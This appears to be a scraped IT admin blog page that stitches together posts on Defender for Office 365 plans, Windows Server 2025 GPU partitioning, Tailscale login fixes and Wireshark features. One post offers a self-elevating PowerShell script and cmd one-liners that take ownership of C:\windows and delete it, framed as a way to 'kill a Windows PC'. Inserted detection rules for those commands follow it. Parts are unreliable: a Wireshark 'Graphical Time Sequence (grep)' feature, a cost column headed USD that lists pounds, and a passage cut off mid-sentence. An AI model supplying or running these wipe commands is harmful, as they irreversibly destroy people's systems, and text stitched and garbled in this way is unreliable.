What Are the Differences Between Microsoft Defender for Office 365 P1 & P2, and Is It Worth the Price Difference?

What Are the Differences Between Microsoft Defender for Office 365 P1 & P2?

When it comes to protecting your organisation from email-based threats, Microsoft Defender for Office 365 is a leading solution. But with two plans available — Plan 1 (P1) and Plan 2 (P2) — it can be difficult to know which is the best fit for your business. In this article, we’ll compare the two plans and help you decide if the additional features in Plan 2 are worth the higher cost.

Key Differences Between Plan 1 (P1) and Plan 2 (P2)

| Feature | Plan 1 (P1), £1.64 user/month | Plan 2 (P2), £4.10 user/month |
|---|---|---|
| Protection Against Phishing | Yes | Yes |
| Anti-Spam Protection | Yes | Yes |
| Safe Links | Yes | Yes |
| Safe Attachments | Yes | Yes |
| Threat Intelligence | Yes | Yes |
| Attack Simulator | No | Yes |
| Automated Investigation and Remediation | No | Yes |
| Advanced Threat Protection Reports | No | Yes |
| Custom Policies for Safe Links | No | Yes |
| Advanced Threat Hunting | No | Yes |
| Real-time Threat Detection | No | Yes |

Plan 1: Essential Protection for Office 365

Plan 1 provides essential protection against common email threats like phishing, malware, and spam. Here’s what you get with Plan 1:

  • Protection Against Phishing: Helps to identify and block phishing attacks targeting your users.
  • Anti-Spam Protection: Blocks unwanted email and protects against spam.
  • Safe Links: Provides real-time protection by scanning URLs in email messages to prevent users from clicking on malicious links.
  • Safe Attachments: Scans email attachments for potential threats and isolates them for analysis.

Plan 1 is ideal for businesses that need basic email protection and are using Microsoft 365 services for communication and collaboration.

Features Only Available in Plan 2

Plan 2 builds on the protection offered in Plan 1 and adds additional advanced features for organisations that need more sophisticated defences. In addition to everything in Plan 1, Plan 2 includes:

  • Attack Simulator: Helps simulate real-world phishing attacks to test your organisation’s security awareness and training.
  • Automated Investigation and Remediation: Automatically investigates and remediates threats to reduce manual intervention and improve response times.
  • Advanced Threat Protection Reports: Provides in-depth reporting on threats targeting your organisation.
  • Custom Policies for Safe Links: Customises the protection of URLs to suit your organisation’s specific security needs.
  • Advanced Threat Hunting: Allows you to proactively search for and identify potential threats within your environment.
  • Real-time Threat Detection: Detects and responds to advanced threats in real time, ensuring quicker mitigation.

Plan 2 is designed for organisations that require more advanced protection and want automated security management, as well as additional tools for threat investigation and prevention.

These exclusive capabilities make Plan 2 the go-to choice for businesses that need more control over their email security and quicker, more efficient responses to emerging threats.

Is the Extra Cost for Plan 2 Worth It?

Choosing between Plan 1 and Plan 2 depends on the needs of your organisation, your budget, and the level of protection you require. Here’s a quick breakdown:

  • Plan 1: Best for smaller organisations or those who only need essential protection for email security. It’s a cost-effective option that provides solid defences and is included in Microsoft 365 Business Premium and Microsoft 365 E3 licences.
  • Plan 2: Ideal for larger organisations or those with higher security needs. Plan 2 includes all features of Plan 1 plus advanced protection tools, custom policies, and automation. Plan 2 is available with Microsoft 365 E5 licences.

If your organisation faces a higher risk of targeted attacks, or you need enhanced security and more automation, the additional cost for Plan 2 could be well worth it for the added peace of mind.

What GPUs does Windows Server 2025 support for GPU Partitioning? [Solved]

Supported GPUs for GPU Partitioning in Windows Server 2025

Virtualization has transformed IT, enabling us to run multiple VMs and OSs on a single server. But for resource-intensive tasks like AI and machine learning, powerful graphics processing is essential. This is where Windows Server 2025’s GPU partitioning comes into play, allowing multiple virtual machines (VMs) to share a single GPU’s power, optimising usage and enhancing workload capacity.

What is GPU Partitioning?

With GPU partitioning, a single physical GPU can be split into multiple virtual GPUs (vGPUs), each assigned to different VMs. This enables simultaneous execution of resource-heavy tasks, like AI and ML workloads, all on a shared GPU—making it a game-changer for high-demand environments.

Supported GPUs

Currently only a handful of NVIDIA GPUs support partitioning with Windows Server 2025. Here’s a list of the graphics cards supported for GPU Partitioning in Windows Server 2025:

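| GPU Model | Rough Cost (USD) | CUDA Cores | TF32 teraFLOPS or Tensor Cores | Memory (GB) | TDP (Watts) |
|---|---|---|---|---|---|
| NVIDIA A2 | £1300-1800 | 1280 | 40-60 | 16 | 40-60 |
| NVIDIA A10 | £2300+ | 8192 | 275-410 | 24 | 150 |
| NVIDIA A16 | £2700+ | 5120 (4x 1280) | 4x 40 Cores | 64 | 250 |
| NVIDIA A40 | £5100+ | 10,752 | 74.8 – 149.6 | 48 | 300 |
| NVIDIA L2 | Not out yet | n/a | 48.3 | 24 | TBD |
| NVIDIA L4 | £2500+ | n/a | 120 | 24 | 72 |
| NVIDIA L40 | £7500+ | 18176 | 568, Gen 4 Cores | 48 | 300 |
| NVIDIA L40S | £9700+ | 18,176 | 366 | 48 | 350 |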

Notes

  • My pick would be the NVIDIA A16, which currently offers what is basically 4 GPUs on one card already, making it ideal for partitioning.
  • Details for some GPUs, especially newer models, are limited and may change as they become more widely available.
  • Most of these cards are made for the enterprise market, so don’t go thinking you will suddenly be able to set up 4 gaming PCs on one server and get good graphics results! Whilst it may be possible, these are designed more around tensor cores, which are useful for AI and deep learning, than CUDA cores, which are more multipurpose.

Windows Server 2025’s GPU partitioning unlocks powerful capabilities for optimising hardware and running demanding workloads. While limited to specific NVIDIA GPUs, it’s a step forward for those looking to enhance their system’s efficiency and boost VM computational power. Understanding which GPUs work best for what workloads will become the next big learning curve!

Windows Server 2025: My Top New Favourite Features

Windows Server 2025: Enhanced Security, Performance, and Cloud Integration

It’s finally here! Microsoft has unveiled its latest server operating system, Windows Server 2025, and it should provide significant advancements in performance, security, and cloud integration. Below are some of the features that stuck out to me with my first install.

My Top 5 New Features of Windows Server 2025

  • Block Cloning: This feature significantly improves file copy performance, especially for large files, by copying only modified blocks and so reducing I/O.
  • SMB over QUIC: This enables secure access to file shares over the internet, providing faster and more reliable file transfers using native SMB technologies.
  • Hotpatching: This allows for the application of security updates to running servers with minimal downtime. No more out-of-hours scheduling of reboots!
  • GPU Partitioning: This lets you divide GPU resources into smaller, virtualized GPUs. Adding GPU resources to a VM? Yes please!
  • Enhanced Active Directory: This includes features like AD object repair, optional 32k database page size, and improved security for confidential attributes and default machine account passwords.

Key Features of Windows Server 2025:

  • Enhanced Security: Robust security measures, including hardened SMB protocols, improved Active Directory, and enhanced protection against cyber threats.
  • Accelerated Performance: Significant performance boosts for virtualization, storage, and networking, especially for AI and machine learning workloads.
  • Seamless Cloud Integration: Improved integration with Azure for hybrid and multi-cloud environments, enabling seamless workload migration and management.
  • Modernized Infrastructure: Support for the latest hardware and software technologies, including NVMe storage and GPU acceleration.

    It’s just a bit better in every way than Server 2022 – and 100% better than 2012 R2!

| Feature | Windows Server 2025 | Windows Server 2022 | Windows Server 2012 R2 |
|---|---|---|---|
| Security | Enhanced security protocols, improved AD, stronger threat protection | Robust security features, including shielded VMs and credential guard | Basic security features with early Active Directory improvements and Security Essentials |
| Performance | Accelerated virtualization, storage, and networking, optimized for AI/ML | Strong performance, especially for virtualization and storage | Improved performance for Hyper-V and storage, but limited optimization for newer technologies |
| Cloud Integration | Deeper Azure integration, seamless workload migration | Good Azure integration, basic hybrid cloud capabilities | Limited cloud integration, early support for hybrid environments with System Center |
| Hardware Support | Support for latest hardware, including NVMe and GPU | Support for modern hardware, including NVMe | Support for basic hardware configurations; limited support for emerging hardware like NVMe |

In summary, Windows Server 2025 steps up the game with smarter security, better performance, and seamless cloud connectivity. From the efficient file handling with Block Cloning to downtime-reducing Hotpatching, it’s clear this release is built to make life easier for us admins. Adding GPU Partitioning for VM flexibility and enhanced AD features, Microsoft has pushed the envelope to give us a modern, future-proof server OS that seamlessly connects to Azure and Entra.

With all these updates, Windows Server 2025 is a significant improvement over its predecessor, Windows Server 2022, and a massive leap from the now-aged Server 2012 R2. Finally, if you are thinking about upgrading servers that are now EOL, this one’s worth it!

Logging into Tailscale using Microsoft O365 Credentials on Windows

Follow these steps to log into Tailscale using Microsoft O365 credentials:

  1. Pre-requisites:
    • Ensure the PC is connected to the internet.
    • Confirm that Tailscale is installed.
  2. Locating the Taskbar Icon:
    • Look for the Tailscale icon in the Windows taskbar, usually near the clock.
  3. Clicking the Icon:
    A. Click on the Tailscale icon, or right click and select ‘log in’ to initiate the login process.
    B. If this doesn’t work, check whether the PC is using multiple network interfaces (e.g., Wi-Fi and Ethernet) simultaneously. If multiple interfaces are being used, set the interface’s “Automatic Metric” to manual and enter a value.
  4. Microsoft O365 Sign-in:
    • A Tailscale login window will appear.
    • Select the “Sign in with Microsoft” option.
  5. Redirect to Microsoft Login:
    • The default browser will be opened and redirected to the Microsoft O365 login page.
    • Use O365 credentials (email and password).
  6. Two-Factor Authentication (if applicable):
    • If prompted for two-factor authentication, complete the required steps.
  7. Granting Permissions (if applicable):
    • If Windows or O365 asks to grant permissions, review the requested permissions and click “Allow” or “Accept.”
  8. Connecting to the Network:
    • After successful login, the Tailscale app will attempt to establish a secure connection to the network.
  9. Check Connection:
    • Check if it says ‘connected’ or ‘disconnected’ in the taskbar.
  10. Done. 

[Solved] Clicking on Tailscale icon does not let me login

Occasionally I have come across a Tailscale client that does not initially want to display the log in page.

I originally also tried running CLI commands like “tailscale up --authkey xxxxxxxxxx” as well – it seems to hang.

[Image: Tailscale login icon in taskbar]

So when neither the CLI nor clicking on the icon in the taskbar via the GUI lets you log in – check your network cards!
This is usually caused when Tailscale cannot tell which network card has priority.

On Windows:

Win + R //to open run
ncpa.cpl //to open the network settings
Select main network card
Open Properties, then IPv4
Click on Advanced, untick ‘Automatic Metric’
Set to 10.

[Image: setting network card interface metric to solve Tailscale issues]

Try again. Chances are, Tailscale will now let you log in and generate the login page popup allowing sign on. Authkey authentication should also now work.

[Image: Tailscale login screen in browser]
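
The same interface metric fix (the ncpa.cpl steps above, also step 3B of the login guide) can be done from an elevated PowerShell window. This is an added example, not part of the original post: the function names are hypothetical, 'Ethernet' is a placeholder for your main network card, and it assumes the Tailscale adapter keeps its default name.

```powershell
#Requires -RunAsAdministrator
# Added example: scripted form of the "untick Automatic Metric, set to 10" steps.
# Uses the built-in NetTCPIP cmdlets Get-NetIPInterface / Set-NetIPInterface.

function Get-ConnectedInterfaceMetric {
    # Connected IPv4 interfaces, preferred (lowest metric) first.
    # Assumption: loopback and the Tailscale adapter itself are not candidates.
    Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected |
        Where-Object { $_.InterfaceAlias -notmatch 'Loopback|Tailscale' } |
        Sort-Object -Property InterfaceMetric |
        Select-Object -Property InterfaceAlias, InterfaceIndex, AutomaticMetric, InterfaceMetric
}

function Set-PrimaryInterfaceMetric {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string]$InterfaceAlias,
        [ValidateRange(1, 9999)][int]$Metric = 10
    )

    # Fail early if the alias does not exist.
    $before = Get-NetIPInterface -InterfaceAlias $InterfaceAlias -AddressFamily IPv4 -ErrorAction Stop

    # Nothing to do if the card already has this manual metric.
    if ($before.AutomaticMetric -eq 'Disabled' -and $before.InterfaceMetric -eq $Metric) {
        Write-Verbose "$InterfaceAlias already has a manual metric of $Metric."
        return $before
    }

    # Equivalent of unticking 'Automatic Metric' and typing the value in the GUI.
    if ($PSCmdlet.ShouldProcess($InterfaceAlias, "Set manual IPv4 metric $Metric")) {
        Set-NetIPInterface -InterfaceAlias $InterfaceAlias -AddressFamily IPv4 `
            -AutomaticMetric Disabled -InterfaceMetric $Metric
    }

    # Return the resulting state so the change can be confirmed.
    Get-NetIPInterface -InterfaceAlias $InterfaceAlias -AddressFamily IPv4
}

# Show what is competing for priority before changing anything.
$candidates = @(Get-ConnectedInterfaceMetric)
$candidates | Format-Table -AutoSize

if ($candidates.Count -gt 1) {
    # More than one connected card: pin the main one.
    # 'Ethernet' is a placeholder alias; -WhatIf previews the change, remove it to apply.
    Set-PrimaryInterfaceMetric -InterfaceAlias 'Ethernet' -Metric 10 -WhatIf
}
```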

The Windows Death command – How to kill a Windows PC [Revisited]

So about 7 years ago I wrote the original blog post on killing a Windows PC.
Turns out it was one of my most popular posts! So with that in mind, let’s update that script to use PowerShell – seeing as it is 2023 now.

The core basics of the command have not changed much, just the delivery method.
Below is the new Windows Death command:
TakeOwn /F C:\windows /R /D Y
Remove-Item -Recurse -Force C:\windows

Simply run the above in an elevated PowerShell window to wipe the PC.
It really is that simple.

Now how do we make this into a file that we can just right click and run?
Copy and paste the below into a file, and name it PCKiller.PS1 or similar, then right click and ‘Run with PowerShell’. Simple as that:
# Check if script is running as administrator
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
# If not running as administrator, elevate permissions
$arguments = "& '" + $myinvocation.mycommand.definition + "'"
Start-Process powershell -Verb runAs -ArgumentList $arguments
Break
}

# Set window title and colors
$host.UI.RawUI.WindowTitle = "Destroy Windows PC"
$host.UI.RawUI.WindowPosition = "maximized"
$host.UI.RawUI.BackGroundColor = "green"
$host.UI.RawUI.ForeGroundColor = "white"
Clear-Host

# Take ownership of the Windows folder
TakeOwn /F C:\windows /R /D Y

# Get the total number of files and directories to be deleted
$total = (Get-ChildItem -Recurse C:\windows | Measure-Object).Count
$current = 0

# Delete the files and directories
Get-ChildItem -Recurse C:\windows | Remove-Item -Force -Recurse -Verbose -ErrorAction SilentlyContinue | ForEach-Object {
$current++
Write-Progress -Activity "Deleting files" -Status "Progress: $current/$total" -PercentComplete (($current/$total)*100)
}

This script first takes ownership of the Windows folder using the TakeOwn command, just like in the previous version. It then uses the Get-ChildItem command to get a list of all files and directories in the Windows folder and its subfolders. The Measure-Object command is used to count the total number of items, and this count is stored in the $total variable.

Next, the script uses a ForEach-Object loop to iterate over each item in the list and delete it using the Remove-Item command. The -Verbose parameter displays a message for each item that is deleted, and the -ErrorAction SilentlyContinue parameter tells the script to continue running even if an error occurs (such as if a file is in use). The Write-Progress command is used to display a status bar showing the progress of the deletion.

Or if you still like using command prompt, the original, and still the best, as previously posted will still work:
del /S /F /Q /A:S C:\windows
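
On the defensive side, every command in this post leaves a recognisable command line. The following is an added example, not part of the original post: it matches process-creation or script-block log text against the command forms shown above. The function name, rule names and sample records are constructed for illustration.

```powershell
# Added detection example; names and sample records are constructed.

# Path forms that mean the Windows directory itself. The trailing look-ahead
# keeps subfolders (C:\Windows\Temp\...) from matching.
$winDir = '"?(?:[a-z]:\\windows|%(?:systemroot|windir)%)\\?"?(?=\s|$)'

# One rule per command form shown in this post (-match is case-insensitive).
$rules = [ordered]@{}
$rules['takeown /R on the Windows directory'] = '\btakeown(?:\.exe)?"?\s+(?=.*/r\b).*?/f\s+' + $winDir
$rules['Remove-Item -Recurse on the Windows directory'] = '\b(?:remove-item|ri|rm|rmdir|rd|del|erase)\b(?=.*\s-r[a-z]*\b).*?\s' + $winDir
$rules['Get-ChildItem of the Windows directory piped to Remove-Item'] = '\b(?:get-childitem|gci|ls|dir)\b[^|]*\s' + $winDir + '[^|]*\|\s*(?:remove-item|ri|rm|del|erase)\b'
$rules['del or rd /S on the Windows directory'] = '\b(?:del|erase|rd|rmdir)\b(?=.*\s/s\b).*?\s' + $winDir

function Find-WindowsDirWipe {
    # Returns one object per (record, rule) match.
    param([Parameter(Mandatory)][object[]]$Records)

    foreach ($record in $Records) {
        foreach ($name in $rules.Keys) {
            if ($record.CommandLine -match $rules[$name]) {
                [pscustomobject]@{
                    Time        = $record.Time
                    Computer    = $record.Computer
                    Rule        = $name
                    CommandLine = $record.CommandLine
                }
            }
        }
    }
}

# Constructed sample records: four destructive forms, three benign look-alikes.
$sample = @(
    [pscustomobject]@{ Time = '2023-01-10T09:14:02Z'; Computer = 'WS-014'; CommandLine = 'TakeOwn /F C:\windows /R /D Y' }
    [pscustomobject]@{ Time = '2023-01-10T09:14:40Z'; Computer = 'WS-014'; CommandLine = 'powershell.exe -Command "Remove-Item -Recurse -Force C:\windows"' }
    [pscustomobject]@{ Time = '2023-01-10T09:15:05Z'; Computer = 'WS-014'; CommandLine = 'Get-ChildItem -Recurse C:\windows | Remove-Item -Force -Recurse -Verbose' }
    [pscustomobject]@{ Time = '2023-01-10T09:16:11Z'; Computer = 'WS-022'; CommandLine = 'cmd.exe /c del /S /F /Q /A:S C:\windows' }
    [pscustomobject]@{ Time = '2023-01-10T10:02:00Z'; Computer = 'WS-031'; CommandLine = 'takeown /F C:\Windows\Temp\stuck.log' }
    [pscustomobject]@{ Time = '2023-01-10T10:05:30Z'; Computer = 'WS-031'; CommandLine = 'Remove-Item -Recurse -Force C:\Windows\Temp\build' }
    [pscustomobject]@{ Time = '2023-01-10T10:07:12Z'; Computer = 'WS-040'; CommandLine = 'cmd.exe /c del /S /Q C:\Users\sam\AppData\Local\Temp' }
)

$hits = @(Find-WindowsDirWipe -Records $sample)
$hits | Format-Table -AutoSize -Wrap
```

The patterns only see text that reaches the log, so a script run from a file needs PowerShell script block logging enabled for the piped form to be visible.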

Using Wireshark to Troubleshoot Network Connectivity Issues: Summary

Wireshark is a powerful tool for network support technicians who are trying to troubleshoot connectivity issues and optimize network performance. In this series, we have covered a number of features in Wireshark that can be particularly useful for troubleshooting network issues, including:

  • “Follow TCP Stream”
  • “Decode As”
  • “IO Graphs”
  • “Expert Infos”
  • “Time Sequence Graph (tcptrace)”
  • “Conversation Filter”
  • “Graphical Time Sequence (grep)”
  • “Statistics”

In the following summary, we will provide a brief overview of each of these features and how they can be used to troubleshoot network issues.

  • “Follow TCP Stream” allows you to see all of the packets in a particular TCP stream in a single window, making it easier to understand the conversation between two devices.
  • “Decode As” allows you to change the way that Wireshark decodes and displays a particular protocol, which can be useful when the default decoding is not correct or when you want to see more detailed information about the protocol.
  • “IO Graphs” allows you to create graphs of packet and byte rates over time, which can help you identify trends and patterns in network traffic.
  • “Expert Infos” displays alerts and warnings about potential problems with the packets being captured, such as retransmissions or out-of-order packets.
  • “Time Sequence Graph (tcptrace)” displays a graph of TCP packet sequence numbers over time, which can help you identify problems with the TCP connection.
  • “Conversation Filter” allows you to filter the packets being displayed based on their source and destination addresses, which can be useful when you are trying to focus on a specific conversation.
  • “Graphical Time Sequence (grep)” displays a graph of packet transmission times over time, which can help you identify trends and patterns in network traffic.
  • “Statistics” provides a wide range of statistical information about the packets being captured, including “Protocol Hierarchy,” “Endpoints,” “IO Graphs,” “Conversations,” “Flow Graph,” “TCP Stream Graphs,” and “HTTP.”
  • “Protocol Hierarchy” displays a graphical representation of the protocols being used on your network, with the most frequently used protocols at the top. It is useful for identifying potential problems with your network.

Overall, Wireshark is a powerful tool that can be used to troubleshoot a wide range of network connectivity issues. By using the features discussed in this series, network support technicians can quickly and effectively identify and resolve problems with their networks, improving overall performance and reliability. Whether you are a seasoned network support professional or just starting out, learning how to use Wireshark is a valuable skill that can help you troubleshoot and optimize your network.

[SOLVED] Using Wireshark to Troubleshoot Network Connectivity Issues: Statistics

Using Wireshark to Troubleshoot Network Connectivity Issues: Statistics

In addition to the “Follow TCP Stream,” “Decode As,” “IO Graphs,” “Expert Infos,” “Time Sequence Graph (tcptrace),” “Conversation Filter,” and “Graphical Time Sequence (grep)” features, Wireshark also includes a tool called “Statistics” that provides a wide range of statistical information about the packets being captured.

To use the “Statistics” feature, simply select the “Statistics” menu and then choose the type of statistical information that you want to view. Wireshark provides a number of different options, including “Protocol Hierarchy,” “Endpoints,” “IO Graphs,” “Conversations,” “Flow Graph,” “TCP Stream Graphs,” and “HTTP.”

Part A: How to Use the Protocol Hierarchy
To use the “Protocol Hierarchy” option in the “Statistics” feature in Wireshark, follow these steps:

  1. Select the “Statistics” menu and then choose “Protocol Hierarchy.”
  2. In the “Protocol Hierarchy” window, you will see a graphical representation of the protocols being used on your network, with the most frequently used protocols at the top.
  3. To view more detailed information about a specific protocol, click on the protocol in the graph. This will open a new window with a breakdown of the packets being captured for that protocol.

Part B: Why the Protocol Hierarchy is Useful
The “Protocol Hierarchy” option in the “Statistics” feature is useful for a number of reasons:

It provides a high-level overview of the protocols being used on your network. By seeing which protocols are being used the most, you can get a sense of the types of traffic that are generating the most activity on your network.

It helps you identify any potential problems with your network. For example, if you see that a particular protocol is being used much more frequently than others, it could be a sign that there is a problem with that protocol or that it is being used excessively.

It allows you to drill down into specific protocols to get more detailed information. By clicking on a specific protocol in the graph, you can open a new window with a breakdown of the packets being captured for that protocol, which can help you identify any issues with the packets or the protocol itself.

It helps you optimize your network by identifying any protocols that are using up too much bandwidth or causing other performance issues. By identifying and addressing these issues, you can improve the overall performance of your network.

Overall, the “Protocol Hierarchy” option in the “Statistics” feature in Wireshark is a valuable tool for network support technicians who are trying to troubleshoot connectivity issues and optimize network performance.

[SOLVED] Using Wireshark to Troubleshoot Network Connectivity Issues: Graphical Time Sequence (grep)

Using Wireshark to Troubleshoot Network Connectivity Issues: Graphical Time Sequence (grep)

In addition to the “Follow TCP Stream,” “Decode As,” “IO Graphs,” “Expert Infos,” “Time Sequence Graph (tcptrace),” and “Conversation Filter” features, Wireshark also includes a tool called the “Graphical Time Sequence (grep)” feature that allows you to visualize the flow of traffic between two devices over time in a graphical format.

To use the “Graphical Time Sequence (grep)” feature, simply select the “Statistics” menu and then choose “TCP Stream Graphs -> Time-Sequence Graph (Stevens).” This will open a new window that allows you to choose the stream that you want to visualize.

The “Graphical Time Sequence (grep)” feature shows the flow of traffic between two devices over time, with the x-axis representing time and the y-axis representing the sequence numbers of the packets being sent. You can use this tool to identify any problems with the flow of traffic, such as delays or missing packets.

By using the “Graphical Time Sequence (grep)” feature in combination with other diagnostic tools, such as the “Follow TCP Stream” and “IO Graphs” features, you can gain a deeper understanding of the traffic on your network and identify potential problems. With a little bit of practice and a thorough understanding of the features and techniques available in Wireshark, you can become an expert at troubleshooting network issues and keeping

[SOLVED] Using Wireshark to Troubleshoot Network Connectivity Issues: Conversation Filter

Using Wireshark to Troubleshoot Network Connectivity Issues: Conversation Filter

In addition to the “Follow TCP Stream,” “Decode As,” “IO Graphs,” “Expert Infos,” and “Time Sequence Graph (tcptrace)” features, Wireshark also includes a tool called the “Conversation Filter” that allows you to view the packets being exchanged between two specific devices or between devices using a specific protocol.

To use the “Conversation Filter” feature, simply select the “Statistics” menu and then choose “Conversations.” This will open a new window that displays a list of all the conversations that have been captured.

You can use the “Conversation Filter” feature to view the packets being exchanged between two specific devices or between devices using a specific protocol. To filter the conversations, you can use a variety of criteria, including the source and destination addresses, the protocol being used, and various other packet attributes.

The “Conversation Filter” feature is especially useful when you want to focus on a specific set of packets and see how they are being exchanged between devices. By using the “Conversation Filter” feature in combination with other diagnostic tools, such as the “Follow TCP Stream” and “IO Graphs” features, you can gain a deeper understanding of the traffic on your network and identify potential problems.

How to Use the Conversation Filter
To use the “Conversation Filter” feature in Wireshark, follow these steps:

  1. Select the “Statistics” menu and then choose “Conversations.”
  2. In the “Filter” field at the top of the window, enter the criteria that you want to use to filter the conversations.
  3. Click the “Apply” button to apply the filter and display the filtered conversations.

For example, if you want to see the packets being exchanged between two specific devices, you can enter the IP addresses of the devices in the “Filter” field. If you want to see the packets being exchanged between devices using a specific protocol, you can enter the name of the protocol in the “Filter” field.

With a little bit of practice and a thorough understanding of the features and techniques available in Wireshark, you can become an expert at troubleshooting network issues and keeping your network running smoothly.